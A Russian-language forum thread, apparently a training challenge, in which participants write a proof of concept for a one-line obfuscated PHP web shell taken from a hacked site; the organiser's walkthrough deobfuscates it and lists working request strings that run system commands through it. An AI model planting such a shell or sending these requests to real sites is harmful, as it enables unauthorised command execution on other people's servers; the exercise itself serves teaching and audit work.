Это задание с минимальным уровнем сложности. Безо всяких подвохов, специальных знаний и необходимости включать хакерскую догадку. Скорее - практическое занятие, близкое к реальности. Вам прислали файл, который был залит во время взлома некоторого сайта (см. аттач). И попросили провести аудит. Предположительно это мини шелл. Нужно подтвердить возможность RCE (удаленного выполнения команд). Содержимое файла: Code: <?=@$_GET[_]==@_&&@$_GET[__]($_GET[___]); Задание: Составить POC, который выполнит вашу команду через этот файл. В ПМ жду урл с параметрами вызова скрипта. Срок: две недели Правила остаются прежними: В теме не флудим, подсказки разрешены только от ТС. Прошли: Skofield joelblack trololoman96 WallHack Baskin-Robbins MichelleBoxing lifescore st55 Gasc0igne Прохождение
Такого простого задания еще не было. Одна строчка кода. Вот даже трудно придумать хинт, поскольку решается влёт, "в уме". Но оно хорошо подойдет тем, кто только начинает. Нотация не самая читабельная, отличается от примеров в учебнике, но смысл от этого не исчезает, его просто нужно восстановить. В крайнем случае выручат отладочные средства.
В традицию тасков также входит отметиться в топике, если прошел задание. Это не обязательное условие, но приятная привилегия .
особенно интересно, когда решал не правильно скопированное задание ))) <?=@$_GET[_]==@$_&&@$_GET[__]($_GET[___]);
Задание закрыто. Прохождение. Смотрим еще раз строку кода Code: <?=@$_GET[_]==@_&&@$_GET[__]($_GET[___]); Не очень удобная запись для восприятия, много символов подчеркивания, экономия на кавычках и подавленные варнинги. Перепишем так: Code: $_GET['_']=='_' && $_GET['__']($_GET['___']); Подчеркивания допустимо использовать в качестве имени переменной. Стало понятнее, "логическое И" (&&) объединяет два выражения, справа - классическое Обращение к функциям через переменные. Слева - дополнтельная проверка, что то вроде проверки пароля, примерно такой метакод: Code: $pass='word'; $function='system'; $parameter='whoami'; if($pass == 'word'){ $function($parameter); } ФсЁ. Соответствено вызовы могут быть такие: Code: ?_=_&__=phpinfo&___=-1 ?_=_&__=system&___=dir ?_=_&__=printf&___=RCE